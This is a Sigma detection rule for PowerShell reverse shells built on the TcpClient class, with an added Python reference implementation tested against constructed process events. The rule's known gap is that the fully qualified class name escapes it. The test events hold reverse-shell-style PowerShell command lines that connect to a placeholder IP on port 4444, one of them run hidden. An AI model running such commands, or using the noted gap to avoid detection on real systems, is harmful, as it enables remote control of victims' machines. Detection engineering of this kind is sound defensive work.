Potential Powershell ReverseShell Connection
- source: sigma
- techniques:
  - t1059
  - t1059.001
Description
Detects usage of the “TcpClient” class, which can be abused to establish remote connections and reverse shells, as seen in the Nishang “Invoke-PowerShellTcpOneLine” reverse shell and others.
Detection logic
condition: all of selection_*
selection_cli:
  CommandLine|contains|all:
    - ' Net.Sockets.TCPClient'
    - .GetStream(
    - .Write(
selection_img:
  - OriginalFileName:
      - PowerShell.EXE
      - pwsh.dll
  - Image|endswith:
      - \powershell.exe
      - \pwsh.exe
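The following is an added reference implementation of the rule's matching logic (not code from the Sigma project) run over constructed process-creation events; the event records and their field values are invented for the test. It also shows a gap visible in the rule text itself: the leading space in ' Net.Sockets.TCPClient' means the fully qualified System.Net.Sockets.TCPClient spelling does not match.

```python
# Sigma string modifiers compare case-insensitively, so everything is lowercased.
CLI_ALL = [" net.sockets.tcpclient", ".getstream(", ".write("]
IMG_ORIGINAL_FILENAMES = {"powershell.exe", "pwsh.dll"}
IMG_SUFFIXES = ("\\powershell.exe", "\\pwsh.exe")


def selection_cli(event):
    """selection_cli: every token must appear in CommandLine (contains|all)."""
    cmd = event.get("CommandLine", "").lower()
    return all(token in cmd for token in CLI_ALL)


def selection_img(event):
    """selection_img: the two list items are OR-ed, as are the values in each."""
    ofn = event.get("OriginalFileName", "").lower()
    image = event.get("Image", "").lower()
    return ofn in IMG_ORIGINAL_FILENAMES or image.endswith(IMG_SUFFIXES)


def matches_rule(event):
    """condition: all of selection_*"""
    return selection_cli(event) and selection_img(event)


# Constructed events (hypothetical telemetry, not captured data).
EVENTS = [
    {"id": "evt-1", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": ("powershell.exe -nop -w hidden -c \"$c=New-Object Net.Sockets.TCPClient"
                     "('203.0.113.10',4444);$s=$c.GetStream();$s.Write($buf,0,$buf.Length)\"")},
    # Fully qualified class name: no space directly before "Net.", so selection_cli fails.
    {"id": "evt-2", "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "OriginalFileName": "pwsh.dll",
     "CommandLine": ("pwsh.exe -c \"$c=New-Object System.Net.Sockets.TCPClient"
                     "('203.0.113.10',4444);$s=$c.GetStream();$s.Write($buf,0,$buf.Length)\"")},
    # Benign PowerShell network use: none of the three tokens present.
    {"id": "evt-3", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell.exe -c \"Test-NetConnection -ComputerName fileserver -Port 445\""},
    # Tokens present but the image is not PowerShell: selection_img fails.
    {"id": "evt-4", "Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": "cmd.exe /c echo New-Object Net.Sockets.TCPClient .GetStream( .Write( > note.txt"},
]


def alerting_event_ids(events):
    """Return the ids of events the rule would alert on."""
    return [e["id"] for e in events if matches_rule(e)]


if __name__ == "__main__":
    print(alerting_event_ids(EVENTS))
```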